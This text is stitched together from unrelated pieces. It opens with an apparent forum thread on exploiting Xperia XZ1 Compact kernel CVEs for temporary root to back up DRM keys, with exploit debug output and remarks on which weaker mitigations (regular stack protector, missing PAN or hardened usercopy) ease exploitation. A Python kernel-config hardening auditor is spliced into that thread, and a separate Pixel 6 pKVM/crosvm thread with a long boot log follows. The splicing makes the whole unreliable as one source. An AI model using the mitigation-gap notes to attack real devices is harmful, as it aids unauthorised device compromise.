handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
So it also works in qemu, running the kernel binary from the firmware (it needed a few binary patches to avoid hangs due to missing hw features), so this makes a very good playground for real exploit implementation - kernel offsets (after kaslr bypass) should hopefully match with the real device.
There is still a lot of work to do - anybody willing to help?
I'm sorry I can't help because I lack the skills to, but I will sure pay the amount I pledged in the DRM key backup/restore bounty thread, if you manage to pull it off and allow also non developers to do it!
Here is a piece of advice: anybody who would like to keep the possibility of backing up DRM keys should disable all updates so that the fw version stays at the one the phone was bought with.
It is possible that Sony would disable downgrades from a particular version onward - that is after all Google's recommendation for vendors:
google-urges-smartphone-partners-support-android-oreos-rollback-protection
And download the oldest fw version available (do not care about customization not matching your phone original) to have it handy in case Sony pulls the fw off.
It would be useful if anybody who has already upgraded to the latest fw version tried whether it is still possible to downgrade, for example to the 47.1.A.2.281 discussed here, and reported the result.
@j4nn: Are all your observations so far specific to the XZ1C? As the exploit itself isn't inherent to the XZ1C, might it be worthwhile to crosspost this to the XZ1 and XZ1 Premium forums? The more eyeballs you can get on this idea, the better.
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
An interesting find: the kernel from the 47.1.A.2.281 fw has the following option in its config:
CONFIG_CC_STACKPROTECTOR_REGULAR=y
It seems that this is changed to STRONG variant since 47.1.A.3.xxx firmwares.
That means stack based kernel exploits could still be possible with the 2.281 fw - for comparison in linux kernel:
- regular: 1015 of 36110 functions are stack-protected (2.81%)
- strong: 7401 of 36110 functions are stack-protected (20.5%)
Just for reference - following options are enabled:
- CONFIG_ARM64_SW_TTBR0_PAN: Privileged Access Never (PAN) sw emulation
- CONFIG_DEBUG_RODATA: Make kernel text and rodata read-only (Post-init read-only memory)
- CONFIG_RANDOMIZE_BASE: Randomize the address of the kernel image (KASLR)
- CONFIG_HARDENED_USERCOPY
- Privileged Execute Never (PXN) is obviously integrated by default (preventing user code execution with privilege mode)
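An added example (not from the thread and not Sony's or the poster's code): a small auditor that reads a kernel `.config`, reports the state of the hardening options listed in the post above, and shows which of them changed between two builds. The three config snippets are constructed for illustration; only the option names come from the post, with `CONFIG_CC_STACKPROTECTOR_STRONG` assumed as the 4.4-era name of the STRONG variant.

```python
import re

# Options the post lists as enabled; the stack-protector level is checked separately.
REQUIRED = (
    "CONFIG_ARM64_SW_TTBR0_PAN",
    "CONFIG_DEBUG_RODATA",
    "CONFIG_RANDOMIZE_BASE",
    "CONFIG_HARDENED_USERCOPY",
)
STACK_OPTS = ("CONFIG_CC_STACKPROTECTOR_REGULAR", "CONFIG_CC_STACKPROTECTOR_STRONG")

SET_RE = re.compile(r"^(CONFIG_[A-Za-z0-9_]+)=(.*)$")
UNSET_RE = re.compile(r"^# (CONFIG_[A-Za-z0-9_]+) is not set$")


def parse_kconfig(text):
    """Return {option: value}; '# CONFIG_X is not set' is recorded as 'n'."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = SET_RE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip('"')
            continue
        m = UNSET_RE.match(line)
        if m:
            cfg[m.group(1)] = "n"
    return cfg


def stack_protector_level(cfg):
    """Map the mutually exclusive stack-protector choices to one label."""
    if cfg.get("CONFIG_CC_STACKPROTECTOR_STRONG") == "y":
        return "strong"
    if cfg.get("CONFIG_CC_STACKPROTECTOR_REGULAR") == "y":
        return "regular"
    return "none"


def audit(cfg):
    """List (option, reason) pairs for every hardening gap found."""
    findings = []
    level = stack_protector_level(cfg)
    if level != "strong":
        findings.append(("CONFIG_CC_STACKPROTECTOR_STRONG",
                         f"stack protector is '{level}'"))
    for opt in REQUIRED:
        if cfg.get(opt) != "y":
            # Distinguish "turned off" from "this tree has no such option",
            # e.g. an older kernel without the backported mitigation.
            state = "explicitly disabled" if opt in cfg else "absent"
            findings.append((opt, state))
    return findings


def hardening_diff(old, new):
    """Return {option: (old_value, new_value)} for tracked options that changed."""
    changes = {}
    for opt in STACK_OPTS + REQUIRED:
        before, after = old.get(opt, "absent"), new.get(opt, "absent")
        if before != after:
            changes[opt] = (before, after)
    return changes


# Constructed sample: regular stack protector, the other listed options enabled.
CFG_REGULAR = parse_kconfig("""
CONFIG_CC_STACKPROTECTOR_REGULAR=y
# CONFIG_CC_STACKPROTECTOR_STRONG is not set
CONFIG_ARM64_SW_TTBR0_PAN=y
CONFIG_DEBUG_RODATA=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_HARDENED_USERCOPY=y
""")

# Constructed sample: same options, stack protector switched to STRONG.
CFG_STRONG = parse_kconfig("""
# CONFIG_CC_STACKPROTECTOR_REGULAR is not set
CONFIG_CC_STACKPROTECTOR_STRONG=y
CONFIG_ARM64_SW_TTBR0_PAN=y
CONFIG_DEBUG_RODATA=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_HARDENED_USERCOPY=y
""")

# Constructed sample: a tree missing two mitigations and with KASLR turned off.
CFG_WEAK = parse_kconfig("""
CONFIG_CC_STACKPROTECTOR_REGULAR=y
CONFIG_DEBUG_RODATA=y
# CONFIG_RANDOMIZE_BASE is not set
""")

if __name__ == "__main__":
    for name, cfg in (("regular", CFG_REGULAR), ("strong", CFG_STRONG), ("weak", CFG_WEAK)):
        print(name, audit(cfg) or "no gaps in tracked options")
    print("regular -> strong:", hardening_diff(CFG_REGULAR, CFG_STRONG))
```

On a real build, feed `parse_kconfig` the text of the kernel's `.config` (or the decompressed `/proc/config.gz` where the kernel exposes it).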
j4nn said:
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
When you talk about xz1p is the Sony Xperia XZ Premium , no?
SilverGamer_YT said:
When you talk about xz1p is the Sony Xperia XZ Premium , no?
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
If we have already unlocked bootloader we cannot backup our drmkeys
@SilverGamer_YT, obviously no way if already lost by official unlock
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
that's right, but on the other hand, useful only for that device.
I am wondering - there is no temp root yet for the Premium if it had nougat?
Lowest patch level I could find is April (compared to August of XZ1)... Which is a pretty hard target still.
@mirhl: it's strange that temp root is still not available for xz premium, considering it has nougat fw available.
The kernel is v4.4.21 in that fw and it does not have hardened usercopy, does not have privileged access never and also uses only regular stack protector. So it really would be easier, but it would not help devices that have only oreo fw (and only newer kernel with more mitigations integrated).
I feel we may be able to get temp root.
But what about that TA/drm keys backup?
Is there anybody here who knows for sure that having temp root is enough?
Would not we be faced then with another security feature like trust zone / trusted execution environment from which it would not be possible to extract the keys?
I mean exploiting linux kernel is one thing, but exploiting TEE would probably be lot harder (if not impossible).
Hey guys. Recently I've got a Pixel 6 Pro device.
I'm trying to run a virtual machine on my phone with additional security features of Android 13 kernel which is called protected KVM(pKVM).
After following the steps of the documentation, I encountered the errors below.
The kernel I'm running on my Pixel 6 Pro device is the latest Android 13 kernel. The command I ran is:
Code:
/apex/com.android.virt/bin/crosvm run --protected-vm -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
Has anyone solved these errors or launched a protected virtual machine successfully?
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
roirraW edor ehT said:
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
headheadhead said:
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
You're welcome. Your response reminded me that there was an XDA article on the subject about VMs on the Pixel 6 as well, although it probably won't help with what you're trying to do.
Android 13 DP1 allows Google Pixel 6 to run full-fledged Windows 11 as a VM
The Android 13 DP1 unlocks the full KVM functionality on the Google Pixel 6 and 6 Pro. You can now boot Windows 11 and Linux VMs on these phones.
www.xda-developers.com
Hi, I too followed the instruction, but could not get it to run. Can someone tell me how they built their kernel?
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
rgarcia1000 said:
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
I can run a VM with following command.
Code:
/apex/com.android.virt/bin/crosvm run -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
The kernel I built is the linux mainline kernel. The image I used is ubuntu cloud image.
Thanks, I will give it a try.
Hi, Guys and Ladies,
I am new to this board. I have been trying to make this work for 3 weeks now.
This is what I tried.
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs /data/local/tmp/ubuntu-20.04-serv>
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ERROR:external/crosvm/src/main.rs:2884] crosvm has exited with error: the architecture failed to build the vm: kernel could not be loaded: Reading image into memory failed: invalid guest memory access at addr=0x80800000: requested memory range spans past the end of the region: offset=8388608 count=568590336 region_size=268435456
I also tried:
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/alpine-rootfs.img /data/local/tmp/Image
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/alpine-rootfs.img
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x411fd440]
[ 0.000000] Linux version 5.16.13-1-aarch64-ARCH ([email protected]) (aarch64-unknown-linux-gnu-gcc (GCC) 11.2.0, GNU ld (GNU Binutils) 2.38) #1 SMP Thu Mar 10 01:59:18 UTC 2022
[ 0.000000] Machine model: linux,dummy-virt
[ 0.000000] efi: UEFI not found.
[ 0.000000] Zone ranges:
[ 0.000000] DMA [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] DMA32 empty
[ 0.000000] Normal empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] cma: Reserved 64 MiB at 0x000000008b800000
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv1.1 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: SMC Calling Convention v1.1
[ 0.000000] smccc: KVM: hypervisor services detected (0x00000000 0x00000000 0x00000000 0x00000003)
[ 0.000000] percpu: Embedded 20 pages/cpu s44568 r8192 d29160 u81920
[ 0.000000] Detected PIPT I-cache on CPU0
[ 0.000000] CPU features: detected: GIC system register CPU interface
[ 0.000000] CPU features: detected: Hardware dirty bit management
[ 0.000000] CPU features: detected: Spectre-v4
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 64512
[ 0.000000] Kernel command line: panic=-1 console=ttyS0 init=/bin/sh root=/dev/vda rw
[ 0.000000] Dentry cache hash table entries: 32768 (order: 6, 262144 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 5, 131072 bytes, linear)
[ 0.000000] mem auto-init: stackff, heap allocff, heap freeff
[ 0.000000] Memory: 150828K/262144K available (19648K kernel code, 3938K rwdata, 9712K rodata, 6336K init, 865K bss, 45780K reserved, 65536K cma-reserved)
[ 0.000000] random: get_random_u64 called from cache_random_seq_create+0x84/0x184 with crng_init=0
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=1.
[ 0.000000] Trampoline variant of Tasks RCU enabled.
[ 0.000000] Rude variant of Tasks RCU enabled.
[ 0.000000] Tracing variant of Tasks RCU enabled.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0
[ 0.000000] GICv3: 32 SPIs implemented
[ 0.000000] GICv3: 0 Extended SPIs implemented
[ 0.000000] GICv3: Distributor has no Range Selector support
[ 0.000000] Root IRQ handler: gic_handle_irq
[ 0.000000] GICv3: 16 PPIs implemented
[ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000003ffd0000
[ 0.000000] arch_timer: cp15 timer(s) running at 24.57MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x5ab00a189, max_idle_ns: 440795202599 ns
[ 0.000000] sched_clock: 56 bits at 24MHz, resolution 40ns, wraps every 4398046511099ns
[ 0.000062] arm-pv: using stolen time PV
[ 0.000271] Console: colour dummy device 80x25
[ 0.000320] Calibrating delay loop (skipped), value calculated using timer frequency.. 49.15 BogoMIPS (lpj=24576)
[ 0.000324] pid_max: default: 32768 minimum: 301
[ 0.000385] LSM: Security Framework initializing
[ 0.000407] Yama: becoming mindful.
[ 0.000490] Mount-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.000500] Mountpoint-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.002706] rcu: Hierarchical SRCU implementation.
[ 0.004135] EFI services will not be available.
[ 0.004315] smp: Bringing up secondary CPUs ...
[ 0.004317] smp: Brought up 1 node, 1 CPU
[ 0.004319] SMP: Total of 1 processors activated.
[ 0.004322] CPU features: detected: 32-bit EL0 Support
[ 0.004323] CPU features: detected: Data cache clean to the PoU not required for I/D coherence
[ 0.004325] CPU features: detected: Common not Private translations
[ 0.004326] CPU features: detected: CRC32 instructions
[ 0.004328] CPU features: detected: RCpc load-acquire (LDAPR)
[ 0.004329] CPU features: detected: LSE atomic instructions
[ 0.004330] CPU features: detected: Privileged Access Never
[ 0.004331] CPU features: detected: RAS Extension Support
[ 0.004339] CPU features: detected: Speculative Store Bypassing Safe (SSBS)
[ 0.040419] CPU: All CPU(s) started at EL1
[ 0.040435] alternatives: patching kernel code
[ 0.041279] devtmpfs: initialized
[ 0.041694] Registered cp15_barrier emulation handler
[ 0.041699] Registered setend emulation handler
[ 0.041765] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[ 0.041769] futex hash table entries: 256 (order: 2, 16384 bytes, linear)
[ 0.041999] pinctrl core: initialized pinctrl subsystem
[ 0.042305] DMI not present or invalid.
[ 0.042538] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.042898] DMA: preallocated 128 KiB GFP_KERNEL pool for atomic allocations
[ 0.043056] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
[ 0.043204] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
[ 0.043214] audit: initializing netlink subsys (disabled)
[ 0.043454] thermal_sys: Registered thermal governor 'fair_share'
[ 0.043455] thermal_sys: Registered thermal governor 'bang_bang'
[ 0.043456] thermal_sys: Registered thermal governor 'step_wise'
[ 0.043457] thermal_sys: Registered thermal governor 'user_space'
[ 0.043457] thermal_sys: Registered thermal governor 'power_allocator'
[ 0.043465] cpuidle: using governor ladder
[ 0.043467] cpuidle: using governor menu
[ 0.043518] hw-breakpoint: found 6 breakpoint and 4 watchpoint registers.
[ 0.043524] ASID allocator initialised with 65536 entries
[ 0.043836] Serial: AMBA PL011 UART driver
[ 0.046243] audit: type=2000 audit(0.042:1): state=initialized audit_enabled=0 res=1
[ 0.046364] HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages
[ 0.046365] HugeTLB registered 32.0 MiB page size, pre-allocated 0 pages
[ 0.046366] HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages
[ 0.046367] HugeTLB registered 64.0 KiB page size, pre-allocated 0 pages
[ 0.046565] cryptd: max_cpu_qlen set to 1000
[ 0.063702] raid6: neonx8 gen() 21845 MB/s
[ 0.080749] raid6: neonx8 xor() 18988 MB/s
[ 0.097796] raid6: neonx4 gen() 22290 MB/s
[ 0.114844] raid6: neonx4 xor() 17047 MB/s
[ 0.131889] raid6: neonx2 gen() 18187 MB/s
[ 0.148933] raid6: neonx2 xor() 16116 MB/s
[ 0.165978] raid6: neonx1 gen() 15432 MB/s
[ 0.183046] raid6: neonx1 xor() 14419 MB/s
[ 0.200402] raid6: int64x8 gen() 9719 MB/s
[ 0.217449] raid6: int64x8 xor() 5117 MB/s
[ 0.234493] raid6: int64x4 gen() 9341 MB/s
[ 0.251540] raid6: int64x4 xor() 5090 MB/s
[ 0.268585] raid6: int64x2 gen() 8131 MB/s
[ 0.285631] raid6: int64x2 xor() 4207 MB/s
[ 0.302676] raid6: int64x1 gen() 6389 MB/s
[ 0.319721] raid6: int64x1 xor() 3552 MB/s
[ 0.319724] raid6: using algorithm neonx4 gen() 22290 MB/s
[ 0.319725] raid6: .... xor() 17047 MB/s, rmw enabled
[ 0.319726] raid6: using neon recovery algorithm
[ 0.319810] ACPI: Interpreter disabled.
[ 0.320010] iommu: Default domain type: Translated
[ 0.320012] iommu: DMA domain TLB invalidation policy: strict mode
[ 0.320055] vgaarb: loaded
[ 0.320277] SCSI subsystem initialized
[ 0.320371] usbcore: registered new interface driver usbfs
[ 0.320383] usbcore: registered new interface driver hub
[ 0.320390] usbcore: registered new device driver usb
[ 0.320436] pps_core: LinuxPPS API ver. 1 registered
[ 0.320437] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[ 0.320439] PTP clock support registered
[ 0.320519] EDAC MC: Ver: 3.0.0
[ 0.320768] Advanced Linux Sound Architecture Driver Initialized.
[ 0.320982] NetLabel: Initializing
[ 0.320983] NetLabel: domain hash size = 128
[ 0.320984] NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO
[ 0.321000] NetLabel: unlabeled traffic allowed by default
[ 0.321090] clocksource: Switched to clocksource arch_sys_counter
[ 0.321255] VFS: Disk quotas dquot_6.6.0
[ 0.321270] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 0.321333] pnp: PnP ACPI: disabled
[ 0.322403] NET: Registered PF_INET protocol family
[ 0.322480] IP idents hash table entries: 4096 (order: 3, 32768 bytes, linear)
[ 0.322840] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.322848] TCP established hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.322873] TCP bind hash table entries: 2048 (order: 3, 32768 bytes, linear)
[ 0.322913] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.323018] MPTCP token hash table entries: 256 (order: 0, 6144 bytes, linear)
[ 0.323033] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323044] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323073] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.323264] RPC: Registered named UNIX socket transport module.
[ 0.323266] RPC: Registered udp transport module.
[ 0.323266] RPC: Registered tcp transport module.
[ 0.323267] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.323268] PCI: CLS 0 bytes, default 64
[ 0.323333] kvm [1]: HYP mode not available
[ 0.323520] Initialise system trusted keyrings
[ 0.323652] workingset: timestamp_bits=46 max_order=16 bucket_order=0
[ 0.324672] zbud: loaded
[ 0.325157] NFS: Registering the id_resolver key type
[ 0.325169] Key type id_resolver registered
[ 0.325170] Key type id_legacy registered
[ 0.325189] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[ 0.325192] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[ 0.325207] ntfs3: Max link count 4000
[ 0.325208] ntfs3: Read-only LZX/Xpress compression included
[ 0.325235] SGI XFS with ACLs, security attributes, quota, no debug enabled
[ 0.334012] NET: Registered PF_ALG protocol family
[ 0.334016] xor: measuring software checksum speed
[ 0.334475] 8regs : 22289 MB/sec
[ 0.334872] 32regs : 26656 MB/sec
[ 0.335122] arm64_neon : 44102 MB/sec
[ 0.335123] xor: using function: arm64_neon (44102 MB/sec)
[ 0.335146] Key type asymmetric registered
[ 0.335147] Asymmetric key parser 'x509' registered
[ 0.335181] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 242)
[ 0.335216] io scheduler mq-deadline registered
[ 0.335217] io scheduler kyber registered
[ 0.335234] io scheduler bfq registered
[ 0.336120] pci-host-generic 10000.pci: host bridge /pci ranges:
[ 0.336133] pci-host-generic 10000.pci: MEM 0x0002000000..0x0003ffffff -> 0x0002000000
[ 0.336136] pci-host-generic 10000.pci: MEM 0x0090800000..0xffffffffff -> 0x0090800000
[ 0.336139] pci-host-generic 10000.pci: Memory resource size exceeds max for 32 bits
[ 0.336141] PCI: OF: PROBE_ONLY enabled
[ 0.336151] pci-host-generic 10000.pci: ECAM at [mem 0x00010000-0x0100ffff] for [bus 00]
[ 0.336173] pci-host-generic 10000.pci: PCI host bridge to bus 0000:00
[ 0.336175] pci_bus 0000:00: root bus resource [mem 0x02000000-0x03ffffff]
[ 0.336176] pci_bus 0000:00: root bus resource [mem 0x90800000-0xffffffffff]
[ 0.336263] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 0.336641] pci 0000:00:01.0: [1af4:1042] type 00 class 0x00ff00
[ 0.336710] pci 0000:00:01.0: reg 0x10: [mem 0x02000000-0x02007fff]
[ 0.337115] pci 0000:00:02.0: [1af4:1044] type 00 class 0x00ff00
[ 0.337160] pci 0000:00:02.0: reg 0x10: [mem 0x02008000-0x0200ffff]
[ 0.337532] pci 0000:00:03.0: [1af4:1045] type 00 class 0x00ff00
[ 0.337590] pci 0000:00:03.0: reg 0x10: [mem 0x02010000-0x02017fff]
[ 0.338005] pci 0000:00:04.0: [1b73:1000] type 00 class 0x0c0330
[ 0.338051] pci 0000:00:04.0: reg 0x10: [mem 0x02020000-0x0202ffff]
[ 0.338280] pci 0000:00:05.0: [1b36:0011] type 00 class 0xffff00
[ 0.338324] pci 0000:00:05.0: reg 0x10: [mem 0x02018000-0x0201800f]
[ 0.338601] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[ 0.338810] IPMI message handler: version 39.2
[ 0.340673] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 0.341038] printk: console [ttyS0] disabled
[ 0.341056] 3f8.U6_16550A: ttyS0 at MMIO 0x3f8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.435958] printk: console [ttyS0] enabled
[ 0.436464] 2f8.U6_16550A: ttyS1 at MMIO 0x2f8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.437278] 3e8.U6_16550A: ttyS2 at MMIO 0x3e8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.438016] 2e8.U6_16550A: ttyS3 at MMIO 0x2e8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.438946] msm_serial: driver initialized
[ 0.439964] cacheinfo: Unable to detect cache hierarchy for CPU 0
[ 0.441149] virtio_blk virtio0: [vda] 5104 512-byte logical blocks (2.61 MB/2.49 MiB)
[ 0.453696] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 0.454270] ehci-pci: EHCI PCI platform driver
[ 0.454594] ehci-platform: EHCI generic platform driver
[ 0.454966] ehci-orion: EHCI orion driver
[ 0.455348] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.455993] ohci-pci: OHCI PCI platform driver
[ 0.456383] ohci-platform: OHCI generic platform driver
[ 0.456811] uhci_hcd: USB Universal Host Controller Interface driver
[ 0.457630] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.458104] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 1
[ 0.459156] xhci_hcd 0000:00:04.0: hcc params 0x30000501 hci version 0x110 quirks 0x0000000000080452
[ 0.460161] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 5.16
[ 0.460851] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.461608] usb usb1: Product: xHCI Host Controller
[ 0.462011] usb usb1: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.462646] usb usb1: SerialNumber: 0000:00:04.0
[ 0.463143] hub 1-0:1.0: USB hub found
[ 0.463495] hub 1-0:1.0: 8 ports detected
[ 0.464194] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.464627] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 2
[ 0.465279] xhci_hcd 0000:00:04.0: Host supports USB 3.0 SuperSpeed
[ 0.465775] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 0.466639] usb usb2: New USB device found, idVendor=1d6b, idProduct=0003, bcdDevice= 5.16
[ 0.467436] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.468076] usb usb2: Product: xHCI Host Controller
[ 0.468511] usb usb2: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.469285] usb usb2: SerialNumber: 0000:00:04.0
[ 0.469718] hub 2-0:1.0: USB hub found
[ 0.470134] hub 2-0:1.0: 8 ports detected
[ 0.470916] SPI driver max3421-hcd has no spi_device_id for maxim,max3421
[ 0.471647] usbcore: registered new interface driver uas
[ 0.472196] usbcore: registered new interface driver usb-storage
[ 0.472728] usbcore: registered new interface driver ums-alauda
[ 0.473262] usbcore: registered new interface driver ums-cypress
[ 0.473811] usbcore: registered new interface driver ums-datafab
[ 0.474339] usbcore: registered new interface driver ums_eneub6250
[ 0.474857] usbcore: registered new interface driver ums-freecom
[ 0.475381] usbcore: registered new interface driver ums-isd200
[ 0.475872] usbcore: registered new interface driver ums-jumpshot
[ 0.476471] usbcore: registered new interface driver ums-karma
[ 0.476980] usbcore: registered new interface driver ums-onetouch
[ 0.477628] usbcore: registered new interface driver ums-realtek
[ 0.478187] usbcore: registered new interface driver ums-sddr09
[ 0.478692] usbcore: registered new interface driver ums-sddr55
[ 0.479190] usbcore: registered new interface driver ums-usbat
[ 0.479673] usbcore: registered new interface driver usbserial_generic
[ 0.480210] usbserial: USB Serial support registered for generic
[ 0.480937] mousedev: PS/2 mouse device common for all mice
[ 0.482039] device-mapper: uevent: version 1.0.3
[ 0.482585] device-mapper: ioctl: 4.45.0-ioctl (2021-03-22) initialised: [email protected]
[ 0.483635] sdhci: Secure Digital Host Controller Interface driver
[ 0.484165] sdhci: Copyright(c) Pierre Ossman
[ 0.484597] Synopsys Designware Multimedia Card Interface Driver
[ 0.485538] sdhci-pltfm: SDHCI platform and OF driver helper
[ 0.486181] ledtrig-cpu: registered to indicate activity on CPUs
[ 0.486938] hid: raw HID events driver (C) Jiri Kosina
[ 0.487505] usbcore: registered new interface driver usbhid
[ 0.488046] usbhid: USB HID core driver
[ 0.489286] Initializing XFRM netlink socket
[ 0.489884] NET: Registered PF_INET6 protocol family
[ 0.492003] Segment Routing with IPv6
[ 0.492396] In-situ OAM (IOAM) with IPv6
[ 0.492901] mip6: Mobile IPv6
[ 0.493198] NET: Registered PF_PACKET protocol family
[ 0.493793] Key type dns_resolver registered
[ 0.494390] registered taskstats version 1
[ 0.494742] Loading compiled-in X.509 certificates
[ 0.495343] zswap: loaded using pool lzo/zbud
[ 0.495785] debug_vm_pgtable: [debug_vm_pgtable ]: Validating architecture page table helpers
[ 0.496723] Key type ._fscrypt registered
[ 0.497098] Key type .fscrypt registered
[ 0.497514] Key type fscrypt-provisioning registered
